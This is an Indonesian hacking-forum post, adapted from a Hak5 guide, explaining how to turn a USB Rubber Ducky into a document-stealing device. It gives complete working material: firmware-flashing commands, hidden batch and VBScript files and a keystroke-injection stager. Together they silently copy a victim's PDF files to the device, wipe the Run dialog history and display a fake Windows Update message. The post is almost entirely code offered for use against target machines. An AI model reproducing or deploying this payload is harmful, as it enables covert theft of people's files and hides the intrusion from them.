Hacking
109

Mencuri File dengan USB Rubber Ducky - Penjelasan Eksfiltrasi USB






  19-Aug-2020 21:31:15



Hallo Malam . . . 

Kali ini saya akan membagikan post tentang usb ducky. Jika kalian tidak mengerti apa itu Usb Ducky bisa klik  Apa itu Usb Rubber Ducky - Seccodeid. Jika kamu sudah mengerti skuy scroll kebawah ya hehe.

Dikutip dari Hak5Blog

Sebagai alat serangan injeksi keystroke yang mampu meniru keyboard USB dan penyimpanan massal, USB Rubber Ducky unggul dalam dokumen yang dapat disaring secara otonom - atau yang biasa kami sebut melakukan pencadangan tidak disengaja. Pada artikel ini saya akan menjelaskan secara singkat langkah-langkah yang diperlukan untuk mengubah USB Rubber Ducky Anda menjadi mesin eksfiltrasi dokumen, seperti yang dijelaskan pada Hak5 episode 2112, 2113 dan 2114.


Rubber Ducky 
Jika Anda baru mengenal USB Rubber Ducky, itu adalah alat serangan injeksi keystroke asli. Artinya, meskipun terlihat seperti Drive USB, ia berfungsi seperti keyboard - mengetik lebih dari 1000 kata per menit. Muatan yang dibuat secara khusus seperti ini meniru pengguna tepercaya, memasukkan penekanan tombol ke komputer dengan kecepatan super. Setelah dikembangkan, siapa pun yang memiliki keterampilan rekayasa sosial atau akses fisik dapat menerapkan muatan ini dengan mudah. Karena komputer mempercayai manusia, dan secara inheren keyboard, komputer mempercayai USB Rubber Ducky.

Hal yang anda perlu 

    • USB Rubber Ducky
    • OS Linux (misalnya Kali)
    • c_duck_v2.1.hex
    • dfu-programmer
    • The duck slurp files
    • The USB Exfiltration payload
    • A Duck Encoder

    Flash USB Rubber Ducky Anda ke firmware “Twin Duck”

      Baik menggunakan perintah dfu-programmer dan c_duck_v2.1.hex secara manual, atau alat ducky-flasher, flash USB Rubber Ducky dengan firmware “Twin Duck” dari Midnightsnake untuk mengaktifkan Keyboard HID USB dan Penyimpanan Massal USB. Mulailah dengan menekan kuat tombol tekan mikro pada USB Rubber Ducky saat mencolokkannya ke komputer Linux Anda dan tetap menahannya selama sekitar 5 detik setelah koneksi. Kemudian jalankan alat ducky-flasher dan ikuti wizard, atau gunakan dfu-programmer untuk secara manual menghapus, mem-flash, dan mengatur ulang perangkat. 

      Code 1

      sudo dfu-programmer at32uc3b1256 erase
      sudo dfu-programmer at32uc3b1256 flash --suppress-bootloader-mem c_duck_v2.1.hex
      sudo dfu-programmer at32uc3b1256 reset 


      Ubah nama label volume kartu Micro SD menjadi “_”

      Menggunakan gparted atau Windows explorer, ganti nama label volume kartu Micro SD USB Rubber Ducky menjadi “_” (tanpa tanda kutip). Ini akan menghemat karakter dan dengan demikian membuat muatan stager kita lebih cepat. Cara termudah untuk mengganti nama label volume adalah dari Windows Explorer. Dari "My Computer" pilih drive dan tekan F2. Ketik _ dan tekan enter. Selesai. 

      Salin muatan bertahap ke root kartu Micro SD yang baru diganti namanya

      Anda memerlukan 3 file dan 1 direktori - d.cmd, e.cmd, i.vbs, dan direktori "slurp". Stager kami akan mengeksekusi d.cmd dari root drive dengan nama volume "_". Dalam hal ini d.cmd akan secara tidak terlihat mengeksekusi e.cmd menggunakan i.vbs.

      d.cmd

      @echo off
      start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
      cscript %~d0\i.vbs %~d0\e.cmd
      @exit  

      e.cmd

      @echo off
      @echo Installing Windows Update

      REM Delete registry keys storing Run dialog history
      REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

      REM Creates directory compromised of computer name, date and time
      REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
      set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
      mkdir %dst% >>nul

      if Exist %USERPROFILE%\Documents (
      REM /C Continues copying even if errors occur.
      REM /Q Does not display file names while copying.
      REM /G Allows the copying of encrypted files to destination that does not support encryption.
      REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
      REM /E Copies directories and subdirectories, including empty ones.

      REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

      REM Same as above but does not create empty directories
      xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
      )

      REM Blink CAPSLOCK key
      start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

      @cls
      @exit

      i.vbs

      CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False  

      Terakhir buat direktori slurp di root kartu Micro SD berlabel "_"

      Encode payload stager

      Sekarang setelah firmware di-flash dan file bertahap tersedia, kami siap untuk menyiapkan stager. Ini akan menjadi skrip ducky yang menjalankan file dengan sangat cepat yang memanggil file di drive Mass Storage untuk menyalin file dari folder Dokumen pengguna.

      REM USB Exfiltration Payload from Hak5 episodes 2112 - 2114
      REM Target: Windows XP SP3+ Author: Hak5Darren Props: Diggster, Midnightsnake
      DELAY 1000
      GUI r
      DELAY 100
      STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')"
      ENTER

      Simpan ini sebagai file teks ASCII standar yang siap untuk dienkode oleh Ducky Script Encoder, seperti command line Java encoder, GUI Java encoder, command line Python encoder / decoder atau Online Ducky Script Encoder.


      Itu dia! Colokkan USB Rubber Ducky yang baru dikonfigurasi dengan muatan Eksfiltrasi ke mesin target dan dalam beberapa detik akan mulai menyalin file tanpa terlihat dari direktori Dokumen pengguna. Tentu saja semua ini dapat dikustomisasi dan dikonfigurasi dengan mengubah file cmd di root kartu Micro SD. Secara default file PDF akan disalin ke direktori slurp di direktori baru yang diberi nama setelah nama host dan cap tanggal dan waktu AS. Selamat menikmati !


      DISCUSSION
      Nothing comment here :(
      Login for comment and discussion.
      Login Here
      POST NEW DISCUSSION
      Popular Posts
      Gps Tracker Seccodeid Free Too...
      Bayu aji Bayu aji
      General
      1307
      108
      Top

      Mass Reverse IP Unlimited
      ImamSy ImamSy
      Hacking
      993
      10
      Top

      Free Proxy List
      Sandidi Sandidi
      Networking
      840
      3
      Top

      Report McAfee Antivirus Hurrri...
      Indrasp Indrasp
      Windows
      743
      93
      Top

      GHunt OSINT Tools - Investiga...
      Sandidi Sandidi
      Tools Hacking
      683
      3
      Top

      Related Post
      Subscribe

      Subscribe free now for latest posts